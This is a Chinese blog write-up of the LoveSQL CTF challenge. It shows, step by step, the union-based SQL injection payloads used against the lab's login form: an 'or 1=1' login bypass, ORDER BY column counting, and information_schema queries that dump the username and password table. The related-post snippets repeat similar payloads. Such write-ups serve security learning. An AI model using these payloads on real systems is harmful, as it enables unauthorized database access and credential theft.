【极客大挑战2019】love sql详解

最新推荐文章于 2023-09-29 19:18:48 发布
最新推荐文章于 2023-09-29 19:18:48 发布
阅读量1.4k 收藏 2
点赞数
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kindyyy/article/details/124203690
版权

这道题其实是最基本的sql注入类型,所以只要掌握最基础的注入知识很容易就可以得到flag

先打开题目,先用万能密码登陆一下

只是一个乱码啊,没什么用,就直接用sql注入了,先查询列数:

1' order by 3 #

有回显,那再尝试一下4?

' order by 4 #

 在进行联合查询,

' union select 1,2,3 #

有两个列,那就直接进行查询数据库名

' union select 1,2,database() #

再查询表名

' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' #

再查询列

' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' #

最后看里面的数据就好了!

' union select 1,2,group_concat(id,username,password) from geek.l0ve1ysq1 #

得到flag

kindyyy
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
[极客挑战 2019]LoveSQL(最基础的sql注入,万能密码登录)
热门推荐
qq_45521281的博客
04-15 1万+
进去之后: 发现登录框,可能是万能密码登录,我们试一下: 在登录框中输入: 用户名:1' or 1=1# 密码:123(随便输) 点击登录 跳转到了check.php页面。并得到了用户名和密码: 尝试密码md5解密失败,还是回到注入的思路上,查询字段数: 在url中输入: /check.php?username=admin' order by 3%23&password=1 ...
[极客挑战 2019]LoveSQL
qq_53689523的博客
02-19 613
更改为limit 1,1(从数据库中下标为1(从0开始标号)开始,取一条数据返回)是没有返回消息,说明就geekuser表中就一条数据。爆出来了密码,以为是flag,但是输入以后不对,但是存在注入点我们是检测出来了,接下来就是获取数据库信息。暴出id,username,password三个字段。暴出id,username,password三个字段。所以,我们采用brup,穷举出表内所有数据。最终,在下标为15的数据处,发现了flag。所以,返回的列为3列,且显示2,3列信息。
极客挑战2019LoveSQL解题
Bird&Bird
10-25 2003
1、打开靶机:BUUCTF在线评测,选择web---->【极客挑战2019LoveSQL 打开被测试站点,是这个样子的,是上一题EasySQL的延续。 2、EasySQL那道题采用万能密码,我们也直接使用万能密码试一下,结果如下: 直接给出了密码。 使用正确的用户名和密码登录一下,结果还是 那使用MD5库碰撞一下,结果也没碰撞出来。 3、继续寻常注入吧。 爆破有多少列(字段数) username=admin&password=6ec1cab79005129..
[极客挑战 2019]LoveSQL 1(SQL注入)
小谢的博客
06-12 4863
[极客挑战 2019]LoveSQL 1(SQL注入)
【BUUCTF】[极客挑战 2019]LoveSQL 详细题解总结笔记 Writeup
algae
08-13 3176
【BUUCTF】[极客挑战 2019]LoveSQL一.题目内容1.考点二. 解题过程1.万能密码2.爆字段3. 一.题目内容 1.考点 二. 解题过程 1.万能密码 账号 admin' or 1=1 # 密码 1 admin 47cb230740bc6725fd194aec8e479fc4 Tips:输入框的#,直接使用hackbar地址栏,需将#进行URL编码,即替换为%23 2.爆字段 check.php?username=admin ' order by 1 %23&passwo
web:[极客挑战 2019]LoveSQL
sleepywin的博客
09-29 475
用union来查询测试注入点,查看回显点CTF-Web-[极客挑战 2019]LoveSQL - 知乎LoveSQL-CSDN博客。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
汽车品牌车系车型sql数据库.zip
09-01
汽车品牌车系车型sql数据库.zip汽车品牌车系车型sql数据库.zip汽车品牌车系车型sql数据库.zip汽车品牌车系车型sql数据库.zip汽车品牌车系车型sql数据库.zip汽车品牌车系车型sql数据库.zip汽车品牌车系车型sql数据库....
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
GFG-:极客极客30天挑战
02-17
极客30天挑战2021年1月 30天练​​习问题的Python解决方案: 与同学一起翻阅怪胎。(Array); 第N个自然数; 不能表示为Sum的最小正整数; 从抽屉里拿出“ k”双袜子的最小采摘次数; 螺旋矩阵奇克兰的硬币; 有效...
Java开发关爱留守儿童网站源码+sql数据库.zip
08-21
Java开发关爱留守儿童网站源码+sql数据库.zipJava开发关爱留守儿童网站源码+sql数据库.zipJava开发关爱留守儿童网站源码+sql数据库.zipJava开发关爱留守儿童网站源码+sql数据库.zipJava开发关爱留守儿童网站源码+sql...
SQL的概要介绍与分析
最新发布
04-26
此外,还有诸如慕课网、极客时间等知名的在线教育平台,提供了从入门到精通的SQL课程,帮助学习者系统地掌握SQL的各个方面。 最后,SQL的社区也非常活跃。在这个社区中,开发者们可以交流经验、分享技巧、解决问题...
[极客挑战2019]LoveSQL(刚!刚!刚!)
Rick66Ashley的博客
08-10 126
回到题目,要查geek的数据表,那要加上数据库为geek的条件,即:1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' #中间的可以查看表名1' union select 1,2,group_concat(table_name) from information_schema.tables #1' or 1=1 # 密码随便输,enter,发现可以注入;
[极客挑战 2019]LoveSQL 1(详细版)
qq_61861243的博客
09-26 714
1、首先打开网站页面,一看是一个登录界面,我们想到运用SQL注入,利用密码1’ or 1=1登陆一下,得到admin用户以及他的密码。2、根据之前获得的信息对我找flag没有啥有用的信息,我想到利用SQL语句查询一下刚刚得到的admin所在表的列信息,这里我使用1%27order by 4 %23 与 1%27order by 3 %23 对比判断出表的列数为3。(用%27替代’ , %23替代#)
极客挑战 2019]EasySQL
09-03
EasySQL极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要根据题目要求来编写 SQL 查询语句,从而得到正确的结果。这道题的目标是考察你对 SQL 查询语句的掌握程度和对数据库操作的理解。 在极客挑战 2019 中,EasySQL 是一个相对较简单的题目,旨在帮助参赛者熟悉 SQL 查询语句的基本使用和常见操作。通过解决这个问题,你将能够提高自己的 SQL 查询能力,并为更复杂的数据库操作打下基础。 如果你有关于 EasySQL 的具体问题,我可以帮助你更详细地解答。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值